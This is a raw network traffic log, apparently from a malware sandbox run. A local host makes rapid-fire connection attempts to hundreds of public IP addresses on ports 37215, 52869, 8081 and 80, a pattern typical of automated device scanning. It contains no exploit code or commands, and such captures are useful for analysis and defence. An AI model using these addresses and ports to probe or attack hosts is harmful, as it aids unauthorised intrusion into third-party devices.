                                                Jul 20, 2024 23:05:33.896508932 CEST496148081192.168.2.14190.19.12.161
                                                Jul 20, 2024 23:05:33.897116899 CEST494268081192.168.2.14203.122.70.32
                                                Jul 20, 2024 23:05:33.897350073 CEST8041830112.210.253.203192.168.2.14
                                                Jul 20, 2024 23:05:33.897377014 CEST5102237215192.168.2.1491.134.129.146
                                                Jul 20, 2024 23:05:33.897475958 CEST4183080192.168.2.14112.210.253.203
                                                Jul 20, 2024 23:05:33.897950888 CEST5319080192.168.2.14112.202.133.26
                                                Jul 20, 2024 23:05:33.898087025 CEST3721548094157.153.180.139192.168.2.14
                                                Jul 20, 2024 23:05:33.898143053 CEST4809437215192.168.2.14157.153.180.139
                                                Jul 20, 2024 23:05:33.899835110 CEST6049052869192.168.2.14188.199.48.64
                                                Jul 20, 2024 23:05:33.900506020 CEST5286953972183.59.191.208192.168.2.14
                                                Jul 20, 2024 23:05:33.900557995 CEST5397252869192.168.2.14183.59.191.208
                                                Jul 20, 2024 23:05:33.902905941 CEST365548081192.168.2.14142.57.242.144
                                                Jul 20, 2024 23:05:33.903094053 CEST808149426203.122.70.32192.168.2.14
                                                Jul 20, 2024 23:05:33.903166056 CEST4600837215192.168.2.14197.164.107.109
                                                Jul 20, 2024 23:05:33.903177977 CEST372155102291.134.129.146192.168.2.14
                                                Jul 20, 2024 23:05:33.903198957 CEST494268081192.168.2.14203.122.70.32
                                                Jul 20, 2024 23:05:33.903239012 CEST5102237215192.168.2.1491.134.129.146
                                                Jul 20, 2024 23:05:33.903474092 CEST8053190112.202.133.26192.168.2.14
                                                Jul 20, 2024 23:05:33.903568029 CEST5319080192.168.2.14112.202.133.26
                                                Jul 20, 2024 23:05:33.903671980 CEST5455280192.168.2.14112.175.130.75
                                                Jul 20, 2024 23:05:33.904772997 CEST5286960490188.199.48.64192.168.2.14
                                                Jul 20, 2024 23:05:33.904859066 CEST6049052869192.168.2.14188.199.48.64
                                                Jul 20, 2024 23:05:33.904948950 CEST3721544544197.70.47.135192.168.2.14
                                                Jul 20, 2024 23:05:33.905260086 CEST5107452869192.168.2.14149.79.37.237
                                                Jul 20, 2024 23:05:33.907365084 CEST4751037215192.168.2.1434.202.46.128
                                                Jul 20, 2024 23:05:33.908112049 CEST808136554142.57.242.144192.168.2.14
                                                Jul 20, 2024 23:05:33.908124924 CEST3721546008197.164.107.109192.168.2.14
                                                Jul 20, 2024 23:05:33.908176899 CEST4600837215192.168.2.14197.164.107.109
                                                Jul 20, 2024 23:05:33.908176899 CEST365548081192.168.2.14142.57.242.144
                                                Jul 20, 2024 23:05:33.908448935 CEST518148081192.168.2.14148.208.115.237
                                                Jul 20, 2024 23:05:33.909060001 CEST5132680192.168.2.14112.4.253.137
                                                Jul 20, 2024 23:05:33.909115076 CEST8054552112.175.130.75192.168.2.14
                                                Jul 20, 2024 23:05:33.909173012 CEST5455280192.168.2.14112.175.130.75
                                                Jul 20, 2024 23:05:33.909359932 CEST3751052869192.168.2.1420.226.134.71
                                                Jul 20, 2024 23:05:33.910481930 CEST5286951074149.79.37.237192.168.2.14
                                                Jul 20, 2024 23:05:33.910557032 CEST5107452869192.168.2.14149.79.37.237
                                                Jul 20, 2024 23:05:33.912384033 CEST372154751034.202.46.128192.168.2.14
                                                Jul 20, 2024 23:05:33.912444115 CEST4751037215192.168.2.1434.202.46.128
                                                Jul 20, 2024 23:05:33.912913084 CEST6045437215192.168.2.141.160.229.40
                                                Jul 20, 2024 23:05:33.913347006 CEST808151814148.208.115.237192.168.2.14
                                                Jul 20, 2024 23:05:33.913400888 CEST518148081192.168.2.14148.208.115.237
                                                Jul 20, 2024 23:05:33.914060116 CEST591748081192.168.2.14112.156.163.183
                                                Jul 20, 2024 23:05:33.914634943 CEST4887080192.168.2.14112.9.184.223
                                                Jul 20, 2024 23:05:33.914796114 CEST8051326112.4.253.137192.168.2.14
                                                Jul 20, 2024 23:05:33.914843082 CEST5132680192.168.2.14112.4.253.137
                                                Jul 20, 2024 23:05:33.914953947 CEST5163652869192.168.2.1464.61.239.79
                                                Jul 20, 2024 23:05:33.915309906 CEST528693751020.226.134.71192.168.2.14
                                                Jul 20, 2024 23:05:33.915411949 CEST3751052869192.168.2.1420.226.134.71
                                                Jul 20, 2024 23:05:33.917481899 CEST5312037215192.168.2.1441.14.60.190
                                                Jul 20, 2024 23:05:33.918263912 CEST37215604541.160.229.40192.168.2.14
                                                Jul 20, 2024 23:05:33.918478966 CEST6045437215192.168.2.141.160.229.40
                                                Jul 20, 2024 23:05:33.919092894 CEST808159174112.156.163.183192.168.2.14
                                                Jul 20, 2024 23:05:33.919157982 CEST591748081192.168.2.14112.156.163.183
                                                Jul 20, 2024 23:05:33.919440985 CEST8048870112.9.184.223192.168.2.14
                                                Jul 20, 2024 23:05:33.919907093 CEST4887080192.168.2.14112.9.184.223
                                                Jul 20, 2024 23:05:33.919914961 CEST528695163664.61.239.79192.168.2.14
                                                Jul 20, 2024 23:05:33.920505047 CEST5163652869192.168.2.1464.61.239.79
                                                Jul 20, 2024 23:05:33.920542955 CEST4223252869192.168.2.14154.64.178.0
                                                Jul 20, 2024 23:05:33.922497988 CEST372155312041.14.60.190192.168.2.14
                                                Jul 20, 2024 23:05:33.924071074 CEST5312037215192.168.2.1441.14.60.190
                                                Jul 20, 2024 23:05:33.924758911 CEST582548081192.168.2.14147.99.2.34
                                                Jul 20, 2024 23:05:33.925368071 CEST5286942232154.64.178.0192.168.2.14
                                                Jul 20, 2024 23:05:33.930114985 CEST808158254147.99.2.34192.168.2.14
                                                Jul 20, 2024 23:05:33.930857897 CEST4223252869192.168.2.14154.64.178.0
                                                Jul 20, 2024 23:05:33.932508945 CEST582548081192.168.2.14147.99.2.34
                                                Jul 20, 2024 23:05:33.957632065 CEST4484080192.168.2.14112.120.190.128
                                                Jul 20, 2024 23:05:33.962891102 CEST8044840112.120.190.128192.168.2.14
                                                Jul 20, 2024 23:05:33.965064049 CEST4484080192.168.2.14112.120.190.128
                                                Jul 20, 2024 23:05:34.085527897 CEST6031237215192.168.2.14197.160.70.240
                                                Jul 20, 2024 23:05:34.090883970 CEST3721560312197.160.70.240192.168.2.14
                                                Jul 20, 2024 23:05:34.091613054 CEST6031237215192.168.2.14197.160.70.240
                                                Jul 20, 2024 23:05:34.093436003 CEST3279652869192.168.2.1459.35.79.156
                                                Jul 20, 2024 23:05:34.094904900 CEST4995037215192.168.2.14157.76.186.37
                                                Jul 20, 2024 23:05:34.099972010 CEST4648452869192.168.2.14141.0.4.62
                                                Jul 20, 2024 23:05:34.100058079 CEST534928081192.168.2.1414.35.198.9
                                                Jul 20, 2024 23:05:34.100130081 CEST528693279659.35.79.156192.168.2.14
                                                Jul 20, 2024 23:05:34.100199938 CEST3279652869192.168.2.1459.35.79.156
                                                Jul 20, 2024 23:05:34.100718021 CEST3721549950157.76.186.37192.168.2.14
                                                Jul 20, 2024 23:05:34.100780964 CEST4995037215192.168.2.14157.76.186.37
                                                Jul 20, 2024 23:05:34.100934982 CEST4053080192.168.2.14112.214.234.241
                                                Jul 20, 2024 23:05:34.102896929 CEST3864437215192.168.2.1445.182.212.164
                                                Jul 20, 2024 23:05:34.104600906 CEST5150452869192.168.2.14205.35.169.26
                                                Jul 20, 2024 23:05:34.105217934 CEST5286946484141.0.4.62192.168.2.14
                                                Jul 20, 2024 23:05:34.105245113 CEST80815349214.35.198.9192.168.2.14
                                                Jul 20, 2024 23:05:34.105278969 CEST534928081192.168.2.1414.35.198.9
                                                Jul 20, 2024 23:05:34.105288029 CEST4648452869192.168.2.14141.0.4.62
                                                Jul 20, 2024 23:05:34.106003046 CEST3989637215192.168.2.1441.19.68.136
                                                Jul 20, 2024 23:05:34.106168032 CEST8040530112.214.234.241192.168.2.14
                                                Jul 20, 2024 23:05:34.106304884 CEST4053080192.168.2.14112.214.234.241
                                                Jul 20, 2024 23:05:34.107822895 CEST5947852869192.168.2.1424.245.120.74
                                                Jul 20, 2024 23:05:34.107952118 CEST372153864445.182.212.164192.168.2.14
                                                Jul 20, 2024 23:05:34.108045101 CEST388368081192.168.2.1427.100.98.197
                                                Jul 20, 2024 23:05:34.108100891 CEST3864437215192.168.2.1445.182.212.164
                                                Jul 20, 2024 23:05:34.108568907 CEST5991480192.168.2.14112.101.41.231
                                                Jul 20, 2024 23:05:34.110677958 CEST5286951504205.35.169.26192.168.2.14
                                                Jul 20, 2024 23:05:34.110747099 CEST5150452869192.168.2.14205.35.169.26
                                                Jul 20, 2024 23:05:34.111021042 CEST372153989641.19.68.136192.168.2.14
                                                Jul 20, 2024 23:05:34.111382008 CEST3989637215192.168.2.1441.19.68.136
                                                Jul 20, 2024 23:05:34.111917019 CEST5794237215192.168.2.14157.100.189.26
                                                Jul 20, 2024 23:05:34.112941027 CEST528695947824.245.120.74192.168.2.14
                                                Jul 20, 2024 23:05:34.112993002 CEST5947852869192.168.2.1424.245.120.74
                                                Jul 20, 2024 23:05:34.113045931 CEST80813883627.100.98.197192.168.2.14
                                                Jul 20, 2024 23:05:34.113087893 CEST388368081192.168.2.1427.100.98.197
                                                Jul 20, 2024 23:05:34.113570929 CEST8059914112.101.41.231192.168.2.14
                                                Jul 20, 2024 23:05:34.113642931 CEST5991480192.168.2.14112.101.41.231
                                                Jul 20, 2024 23:05:34.114715099 CEST5948452869192.168.2.14223.12.218.46
                                                Jul 20, 2024 23:05:34.116810083 CEST4318037215192.168.2.1441.51.127.171
                                                Jul 20, 2024 23:05:34.118030071 CEST3721557942157.100.189.26192.168.2.14
                                                Jul 20, 2024 23:05:34.118071079 CEST5794237215192.168.2.14157.100.189.26
                                                Jul 20, 2024 23:05:34.119141102 CEST5074052869192.168.2.14105.87.255.111
                                                Jul 20, 2024 23:05:34.119263887 CEST566328081192.168.2.14206.198.219.49
                                                Jul 20, 2024 23:05:34.119652987 CEST5286959484223.12.218.46192.168.2.14
                                                Jul 20, 2024 23:05:34.119690895 CEST5948452869192.168.2.14223.12.218.46
                                                Jul 20, 2024 23:05:34.120160103 CEST4579080192.168.2.14112.58.180.141
                                                Jul 20, 2024 23:05:34.121865034 CEST5495037215192.168.2.1441.65.214.53
                                                Jul 20, 2024 23:05:34.124403000 CEST5536052869192.168.2.14135.221.59.240
                                                Jul 20, 2024 23:05:34.126218081 CEST372154318041.51.127.171192.168.2.14
                                                Jul 20, 2024 23:05:34.126224041 CEST5286950740105.87.255.111192.168.2.14
                                                Jul 20, 2024 23:05:34.126235962 CEST808156632206.198.219.49192.168.2.14
                                                Jul 20, 2024 23:05:34.126261950 CEST8045790112.58.180.141192.168.2.14
                                                Jul 20, 2024 23:05:34.126290083 CEST5074052869192.168.2.14105.87.255.111
                                                Jul 20, 2024 23:05:34.126291990 CEST4318037215192.168.2.1441.51.127.171
                                                Jul 20, 2024 23:05:34.126297951 CEST566328081192.168.2.14206.198.219.49
                                                Jul 20, 2024 23:05:34.126297951 CEST4579080192.168.2.14112.58.180.141
                                                Jul 20, 2024 23:05:34.127952099 CEST372155495041.65.214.53192.168.2.14
                                                Jul 20, 2024 23:05:34.128149033 CEST5495037215192.168.2.1441.65.214.53
                                                Jul 20, 2024 23:05:34.128751993 CEST3783037215192.168.2.14157.89.217.112
                                                Jul 20, 2024 23:05:34.130835056 CEST5758252869192.168.2.14119.225.48.58
                                                Jul 20, 2024 23:05:34.130927086 CEST534168081192.168.2.1489.203.134.23
                                                Jul 20, 2024 23:05:34.131632090 CEST3846480192.168.2.14112.190.49.254
                                                Jul 20, 2024 23:05:34.133773088 CEST3950637215192.168.2.14157.51.200.31
                                                Jul 20, 2024 23:05:34.133780003 CEST5286955360135.221.59.240192.168.2.14
                                                Jul 20, 2024 23:05:34.133845091 CEST5536052869192.168.2.14135.221.59.240
                                                Jul 20, 2024 23:05:34.137631893 CEST4824452869192.168.2.14130.207.23.122
                                                Jul 20, 2024 23:05:34.138123035 CEST3721537830157.89.217.112192.168.2.14
                                                Jul 20, 2024 23:05:34.138176918 CEST3783037215192.168.2.14157.89.217.112
                                                Jul 20, 2024 23:05:34.138983011 CEST5286957582119.225.48.58192.168.2.14
                                                Jul 20, 2024 23:05:34.138989925 CEST80815341689.203.134.23192.168.2.14
                                                Jul 20, 2024 23:05:34.139003038 CEST8038464112.190.49.254192.168.2.14
                                                Jul 20, 2024 23:05:34.139035940 CEST5758252869192.168.2.14119.225.48.58
                                                Jul 20, 2024 23:05:34.139053106 CEST534168081192.168.2.1489.203.134.23
                                                Jul 20, 2024 23:05:34.139147043 CEST3846480192.168.2.14112.190.49.254
                                                Jul 20, 2024 23:05:34.139285088 CEST5658437215192.168.2.14221.229.167.177
                                                Jul 20, 2024 23:05:34.139900923 CEST3721539506157.51.200.31192.168.2.14
                                                Jul 20, 2024 23:05:34.140430927 CEST3950637215192.168.2.14157.51.200.31
                                                Jul 20, 2024 23:05:34.143534899 CEST5235852869192.168.2.14191.30.146.121
                                                Jul 20, 2024 23:05:34.143631935 CEST603628081192.168.2.148.15.94.154
                                                Jul 20, 2024 23:05:34.144342899 CEST5626880192.168.2.14112.65.134.11
                                                Jul 20, 2024 23:05:34.145590067 CEST4423237215192.168.2.1441.219.3.184
                                                Jul 20, 2024 23:05:34.146514893 CEST5286948244130.207.23.122192.168.2.14
                                                Jul 20, 2024 23:05:34.146578074 CEST4824452869192.168.2.14130.207.23.122
                                                Jul 20, 2024 23:05:34.146828890 CEST3721556584221.229.167.177192.168.2.14
                                                Jul 20, 2024 23:05:34.146912098 CEST5658437215192.168.2.14221.229.167.177
                                                Jul 20, 2024 23:05:34.147681952 CEST5130852869192.168.2.14119.83.111.97
                                                Jul 20, 2024 23:05:34.149192095 CEST5286952358191.30.146.121192.168.2.14
                                                Jul 20, 2024 23:05:34.149240017 CEST5235852869192.168.2.14191.30.146.121
                                                Jul 20, 2024 23:05:34.149564981 CEST8081603628.15.94.154192.168.2.14
                                                Jul 20, 2024 23:05:34.149580956 CEST8056268112.65.134.11192.168.2.14
                                                Jul 20, 2024 23:05:34.149617910 CEST603628081192.168.2.148.15.94.154
                                                Jul 20, 2024 23:05:34.149646997 CEST5626880192.168.2.14112.65.134.11
                                                Jul 20, 2024 23:05:34.150594950 CEST5166837215192.168.2.14157.28.53.140
                                                Jul 20, 2024 23:05:34.151226044 CEST372154423241.219.3.184192.168.2.14
                                                Jul 20, 2024 23:05:34.151279926 CEST4423237215192.168.2.1441.219.3.184
                                                Jul 20, 2024 23:05:34.154294014 CEST5596652869192.168.2.1460.73.199.117
                                                Jul 20, 2024 23:05:34.154344082 CEST5286951308119.83.111.97192.168.2.14
                                                Jul 20, 2024 23:05:34.154387951 CEST5130852869192.168.2.14119.83.111.97
                                                Jul 20, 2024 23:05:34.154460907 CEST459688081192.168.2.14154.151.242.45
                                                Jul 20, 2024 23:05:34.155535936 CEST4006080192.168.2.14112.26.197.120
                                                Jul 20, 2024 23:05:34.156107903 CEST3721551668157.28.53.140192.168.2.14
                                                Jul 20, 2024 23:05:34.156215906 CEST5166837215192.168.2.14157.28.53.140
                                                Jul 20, 2024 23:05:34.157458067 CEST5251837215192.168.2.14197.49.145.149
                                                Jul 20, 2024 23:05:34.159389973 CEST528695596660.73.199.117192.168.2.14
                                                Jul 20, 2024 23:05:34.159631968 CEST5596652869192.168.2.1460.73.199.117
                                                Jul 20, 2024 23:05:34.160172939 CEST4027052869192.168.2.14129.37.83.27
                                                Jul 20, 2024 23:05:34.161561966 CEST808145968154.151.242.45192.168.2.14
                                                Jul 20, 2024 23:05:34.161616087 CEST459688081192.168.2.14154.151.242.45
                                                Jul 20, 2024 23:05:34.161909103 CEST5270837215192.168.2.14130.150.233.95
                                                Jul 20, 2024 23:05:34.162029028 CEST8040060112.26.197.120192.168.2.14
                                                Jul 20, 2024 23:05:34.162080050 CEST4006080192.168.2.14112.26.197.120
                                                Jul 20, 2024 23:05:34.164519072 CEST5401052869192.168.2.1434.90.248.232
                                                Jul 20, 2024 23:05:34.164665937 CEST549968081192.168.2.1447.23.180.85
                                                Jul 20, 2024 23:05:34.164684057 CEST3721552518197.49.145.149192.168.2.14
                                                Jul 20, 2024 23:05:34.164736986 CEST5251837215192.168.2.14197.49.145.149
                                                Jul 20, 2024 23:05:34.165158033 CEST5286940270129.37.83.27192.168.2.14
                                                Jul 20, 2024 23:05:34.165410042 CEST4027052869192.168.2.14129.37.83.27
                                                Jul 20, 2024 23:05:34.165662050 CEST5229880192.168.2.14112.236.125.250
                                                Jul 20, 2024 23:05:34.167556047 CEST4586437215192.168.2.14197.27.127.22
                                                Jul 20, 2024 23:05:34.167988062 CEST3721552708130.150.233.95192.168.2.14
                                                Jul 20, 2024 23:05:34.168118000 CEST5270837215192.168.2.14130.150.233.95
                                                Jul 20, 2024 23:05:34.169737101 CEST528695401034.90.248.232192.168.2.14
                                                Jul 20, 2024 23:05:34.169975996 CEST4414452869192.168.2.14132.232.1.40
                                                Jul 20, 2024 23:05:34.169975996 CEST5401052869192.168.2.1434.90.248.232
                                                Jul 20, 2024 23:05:34.170012951 CEST80815499647.23.180.85192.168.2.14
                                                Jul 20, 2024 23:05:34.170111895 CEST549968081192.168.2.1447.23.180.85
                                                Jul 20, 2024 23:05:34.171328068 CEST8052298112.236.125.250192.168.2.14
                                                Jul 20, 2024 23:05:34.171458006 CEST5229880192.168.2.14112.236.125.250
                                                Jul 20, 2024 23:05:34.172724962 CEST3654237215192.168.2.14197.81.135.223
                                                Jul 20, 2024 23:05:34.173167944 CEST3721545864197.27.127.22192.168.2.14
                                                Jul 20, 2024 23:05:34.173226118 CEST4586437215192.168.2.14197.27.127.22
                                                Jul 20, 2024 23:05:34.174967051 CEST5286944144132.232.1.40192.168.2.14
                                                Jul 20, 2024 23:05:34.175221920 CEST4414452869192.168.2.14132.232.1.40
                                                Jul 20, 2024 23:05:34.175731897 CEST5783452869192.168.2.1449.40.97.50
                                                Jul 20, 2024 23:05:34.175895929 CEST470688081192.168.2.1439.255.251.192
                                                Jul 20, 2024 23:05:34.176592112 CEST4637280192.168.2.14112.205.151.30
                                                Jul 20, 2024 23:05:34.178828955 CEST3721536542197.81.135.223192.168.2.14
                                                Jul 20, 2024 23:05:34.178881884 CEST3654237215192.168.2.14197.81.135.223
                                                Jul 20, 2024 23:05:34.181315899 CEST528695783449.40.97.50192.168.2.14
                                                Jul 20, 2024 23:05:34.181674004 CEST5783452869192.168.2.1449.40.97.50
                                                Jul 20, 2024 23:05:34.181790113 CEST5744237215192.168.2.14157.16.85.248
                                                Jul 20, 2024 23:05:34.182096004 CEST80814706839.255.251.192192.168.2.14
                                                Jul 20, 2024 23:05:34.182179928 CEST470688081192.168.2.1439.255.251.192
                                                Jul 20, 2024 23:05:34.182848930 CEST8046372112.205.151.30192.168.2.14
                                                Jul 20, 2024 23:05:34.183043003 CEST4637280192.168.2.14112.205.151.30
                                                Jul 20, 2024 23:05:34.183934927 CEST3326252869192.168.2.14210.141.252.193
                                                Jul 20, 2024 23:05:34.185849905 CEST5481837215192.168.2.14197.145.253.73
                                                Jul 20, 2024 23:05:34.187381983 CEST3721557442157.16.85.248192.168.2.14
                                                Jul 20, 2024 23:05:34.187448025 CEST5744237215192.168.2.14157.16.85.248
                                                Jul 20, 2024 23:05:34.188054085 CEST4003452869192.168.2.14200.51.205.131
                                                Jul 20, 2024 23:05:34.188250065 CEST603968081192.168.2.1457.242.101.56
                                                Jul 20, 2024 23:05:34.188854933 CEST4536480192.168.2.14112.29.219.77
                                                Jul 20, 2024 23:05:34.188906908 CEST5286933262210.141.252.193192.168.2.14
                                                Jul 20, 2024 23:05:34.188970089 CEST3326252869192.168.2.14210.141.252.193
                                                Jul 20, 2024 23:05:34.190918922 CEST3721554818197.145.253.73192.168.2.14
                                                Jul 20, 2024 23:05:34.190984964 CEST5481837215192.168.2.14197.145.253.73
                                                Jul 20, 2024 23:05:34.191128969 CEST3445237215192.168.2.1441.155.35.213
                                                Jul 20, 2024 23:05:34.193105936 CEST5286940034200.51.205.131192.168.2.14
                                                Jul 20, 2024 23:05:34.193466902 CEST80816039657.242.101.56192.168.2.14
                                                Jul 20, 2024 23:05:34.193512917 CEST4003452869192.168.2.14200.51.205.131
                                                Jul 20, 2024 23:05:34.193535089 CEST603968081192.168.2.1457.242.101.56
                                                Jul 20, 2024 23:05:34.193630934 CEST4261452869192.168.2.14145.82.197.86
                                                Jul 20, 2024 23:05:34.193753958 CEST8045364112.29.219.77192.168.2.14
                                                Jul 20, 2024 23:05:34.193882942 CEST4536480192.168.2.14112.29.219.77
                                                Jul 20, 2024 23:05:34.195297003 CEST4333837215192.168.2.14197.144.99.86
                                                Jul 20, 2024 23:05:34.196826935 CEST6045852869192.168.2.1470.127.37.49
                                                Jul 20, 2024 23:05:34.197020054 CEST353568081192.168.2.14116.19.120.13
                                                Jul 20, 2024 23:05:34.197127104 CEST372153445241.155.35.213192.168.2.14
                                                Jul 20, 2024 23:05:34.197195053 CEST3445237215192.168.2.1441.155.35.213
                                                Jul 20, 2024 23:05:34.197742939 CEST5051480192.168.2.14112.14.119.203
                                                Jul 20, 2024 23:05:34.198771000 CEST5286942614145.82.197.86192.168.2.14
                                                Jul 20, 2024 23:05:34.198849916 CEST4261452869192.168.2.14145.82.197.86
                                                Jul 20, 2024 23:05:34.199398041 CEST5114437215192.168.2.14136.230.51.161
                                                Jul 20, 2024 23:05:34.201427937 CEST3721543338197.144.99.86192.168.2.14
                                                Jul 20, 2024 23:05:34.201499939 CEST4333837215192.168.2.14197.144.99.86
                                                Jul 20, 2024 23:05:34.201682091 CEST5024252869192.168.2.14185.138.94.75
                                                Jul 20, 2024 23:05:34.201916933 CEST528696045870.127.37.49192.168.2.14
                                                Jul 20, 2024 23:05:34.201965094 CEST6045852869192.168.2.1470.127.37.49
                                                Jul 20, 2024 23:05:34.202066898 CEST808135356116.19.120.13192.168.2.14
                                                Jul 20, 2024 23:05:34.202110052 CEST353568081192.168.2.14116.19.120.13
                                                Jul 20, 2024 23:05:34.202763081 CEST8050514112.14.119.203192.168.2.14
                                                Jul 20, 2024 23:05:34.202822924 CEST5051480192.168.2.14112.14.119.203
                                                Jul 20, 2024 23:05:34.203509092 CEST3280037215192.168.2.14197.122.120.132
                                                Jul 20, 2024 23:05:34.204772949 CEST3721551144136.230.51.161192.168.2.14
                                                Jul 20, 2024 23:05:34.204828024 CEST5114437215192.168.2.14136.230.51.161
                                                Jul 20, 2024 23:05:34.205244064 CEST5708052869192.168.2.1472.58.64.100
                                                Jul 20, 2024 23:05:34.205542088 CEST565748081192.168.2.1470.175.226.25
                                                Jul 20, 2024 23:05:34.206120014 CEST5277480192.168.2.14112.193.234.6
                                                Jul 20, 2024 23:05:34.206674099 CEST5286950242185.138.94.75192.168.2.14
                                                Jul 20, 2024 23:05:34.206731081 CEST5024252869192.168.2.14185.138.94.75
                                                Jul 20, 2024 23:05:34.207499027 CEST5857637215192.168.2.14157.230.63.1
                                                Jul 20, 2024 23:05:34.208921909 CEST3721532800197.122.120.132192.168.2.14
                                                Jul 20, 2024 23:05:34.208992958 CEST3280037215192.168.2.14197.122.120.132
                                                Jul 20, 2024 23:05:34.209379911 CEST3490652869192.168.2.1439.204.207.21
                                                Jul 20, 2024 23:05:34.210902929 CEST528695708072.58.64.100192.168.2.14
                                                Jul 20, 2024 23:05:34.210947990 CEST5708052869192.168.2.1472.58.64.100
                                                Jul 20, 2024 23:05:34.210957050 CEST4610037215192.168.2.14157.175.25.122
                                                Jul 20, 2024 23:05:34.210961103 CEST80815657470.175.226.25192.168.2.14
                                                Jul 20, 2024 23:05:34.211110115 CEST565748081192.168.2.1470.175.226.25
                                                Jul 20, 2024 23:05:34.211461067 CEST8052774112.193.234.6192.168.2.14
                                                Jul 20, 2024 23:05:34.211551905 CEST5277480192.168.2.14112.193.234.6
                                                Jul 20, 2024 23:05:34.212929964 CEST3721558576157.230.63.1192.168.2.14
                                                Jul 20, 2024 23:05:34.213172913 CEST5857637215192.168.2.14157.230.63.1
                                                Jul 20, 2024 23:05:34.213313103 CEST4281052869192.168.2.1480.130.32.22
                                                Jul 20, 2024 23:05:34.213517904 CEST346708081192.168.2.1440.182.202.6
                                                Jul 20, 2024 23:05:34.214070082 CEST4872880192.168.2.14112.52.82.189
                                                Jul 20, 2024 23:05:34.215280056 CEST528693490639.204.207.21192.168.2.14
                                                Jul 20, 2024 23:05:34.215353966 CEST3490652869192.168.2.1439.204.207.21
                                                Jul 20, 2024 23:05:34.216315031 CEST4345637215192.168.2.14197.167.43.41
                                                Jul 20, 2024 23:05:34.216408014 CEST3721546100157.175.25.122192.168.2.14
                                                Jul 20, 2024 23:05:34.216471910 CEST4610037215192.168.2.14157.175.25.122
                                                Jul 20, 2024 23:05:34.218193054 CEST5605652869192.168.2.1451.156.162.59
                                                Jul 20, 2024 23:05:34.218527079 CEST528694281080.130.32.22192.168.2.14
                                                Jul 20, 2024 23:05:34.218540907 CEST80813467040.182.202.6192.168.2.14
                                                Jul 20, 2024 23:05:34.218574047 CEST4281052869192.168.2.1480.130.32.22
                                                Jul 20, 2024 23:05:34.218594074 CEST346708081192.168.2.1440.182.202.6
                                                Jul 20, 2024 23:05:34.220155954 CEST4246237215192.168.2.14197.86.55.32
                                                Jul 20, 2024 23:05:34.220762014 CEST8048728112.52.82.189192.168.2.14
                                                Jul 20, 2024 23:05:34.220839977 CEST4872880192.168.2.14112.52.82.189
                                                Jul 20, 2024 23:05:34.221412897 CEST3721543456197.167.43.41192.168.2.14
                                                Jul 20, 2024 23:05:34.221534014 CEST4345637215192.168.2.14197.167.43.41
                                                Jul 20, 2024 23:05:34.222193003 CEST3712852869192.168.2.14178.154.163.217
                                                Jul 20, 2024 23:05:34.222671986 CEST489908081192.168.2.14150.141.140.247
                                                Jul 20, 2024 23:05:34.223261118 CEST3964480192.168.2.14112.100.97.111
                                                Jul 20, 2024 23:05:34.223448038 CEST528695605651.156.162.59192.168.2.14
                                                Jul 20, 2024 23:05:34.223598957 CEST5605652869192.168.2.1451.156.162.59
                                                Jul 20, 2024 23:05:34.225187063 CEST3721542462197.86.55.32192.168.2.14
                                                Jul 20, 2024 23:05:34.225229979 CEST4246237215192.168.2.14197.86.55.32
                                                Jul 20, 2024 23:05:34.225239038 CEST5341437215192.168.2.14157.130.208.54
                                                Jul 20, 2024 23:05:34.227416039 CEST5286937128178.154.163.217192.168.2.14
                                                Jul 20, 2024 23:05:34.227480888 CEST3712852869192.168.2.14178.154.163.217
                                                Jul 20, 2024 23:05:34.227483034 CEST5647652869192.168.2.14156.87.172.3
                                                Jul 20, 2024 23:05:34.227848053 CEST808148990150.141.140.247192.168.2.14
                                                Jul 20, 2024 23:05:34.227899075 CEST489908081192.168.2.14150.141.140.247
                                                Jul 20, 2024 23:05:34.228555918 CEST8039644112.100.97.111192.168.2.14
                                                Jul 20, 2024 23:05:34.228612900 CEST3964480192.168.2.14112.100.97.111
                                                Jul 20, 2024 23:05:34.229496956 CEST3620837215192.168.2.14197.143.99.76
                                                Jul 20, 2024 23:05:34.230629921 CEST3721553414157.130.208.54192.168.2.14
                                                Jul 20, 2024 23:05:34.231545925 CEST5341437215192.168.2.14157.130.208.54
                                                Jul 20, 2024 23:05:34.232172966 CEST3759452869192.168.2.14137.29.148.187
                                                Jul 20, 2024 23:05:34.232265949 CEST604228081192.168.2.1480.53.6.37
                                                Jul 20, 2024 23:05:34.232595921 CEST5286956476156.87.172.3192.168.2.14
                                                Jul 20, 2024 23:05:34.232676029 CEST5647652869192.168.2.14156.87.172.3
                                                Jul 20, 2024 23:05:34.232918024 CEST4685280192.168.2.14112.255.194.111
                                                Jul 20, 2024 23:05:34.234513044 CEST3721536208197.143.99.76192.168.2.14
                                                Jul 20, 2024 23:05:34.234550953 CEST3620837215192.168.2.14197.143.99.76
                                                Jul 20, 2024 23:05:34.235244989 CEST5689637215192.168.2.1447.121.106.191
                                                Jul 20, 2024 23:05:34.237205029 CEST4491652869192.168.2.1462.135.228.95
                                                Jul 20, 2024 23:05:34.237349987 CEST5286937594137.29.148.187192.168.2.14
                                                Jul 20, 2024 23:05:34.237536907 CEST80816042280.53.6.37192.168.2.14
                                                Jul 20, 2024 23:05:34.237552881 CEST3759452869192.168.2.14137.29.148.187
                                                Jul 20, 2024 23:05:34.237582922 CEST604228081192.168.2.1480.53.6.37
                                                Jul 20, 2024 23:05:34.237834930 CEST8046852112.255.194.111192.168.2.14
                                                Jul 20, 2024 23:05:34.237889051 CEST4685280192.168.2.14112.255.194.111
                                                Jul 20, 2024 23:05:34.238934040 CEST5261637215192.168.2.14197.91.156.105
                                                Jul 20, 2024 23:05:34.240878105 CEST372155689647.121.106.191192.168.2.14
                                                Jul 20, 2024 23:05:34.240891933 CEST3352052869192.168.2.14207.28.189.232
                                                Jul 20, 2024 23:05:34.240912914 CEST390888081192.168.2.14105.56.143.60
                                                Jul 20, 2024 23:05:34.240938902 CEST5689637215192.168.2.1447.121.106.191
                                                Jul 20, 2024 23:05:34.241616011 CEST4351480192.168.2.14112.84.34.70
                                                Jul 20, 2024 23:05:34.242311001 CEST528694491662.135.228.95192.168.2.14
                                                Jul 20, 2024 23:05:34.242355108 CEST4491652869192.168.2.1462.135.228.95
                                                Jul 20, 2024 23:05:34.243913889 CEST3721552616197.91.156.105192.168.2.14
                                                Jul 20, 2024 23:05:34.243943930 CEST4191037215192.168.2.14157.98.20.252
                                                Jul 20, 2024 23:05:34.243968964 CEST5261637215192.168.2.14197.91.156.105
                                                Jul 20, 2024 23:05:34.245753050 CEST5941852869192.168.2.14153.91.158.250
                                                Jul 20, 2024 23:05:34.248354912 CEST3613437215192.168.2.1441.205.179.211
                                                Jul 20, 2024 23:05:34.248523951 CEST5286933520207.28.189.232192.168.2.14
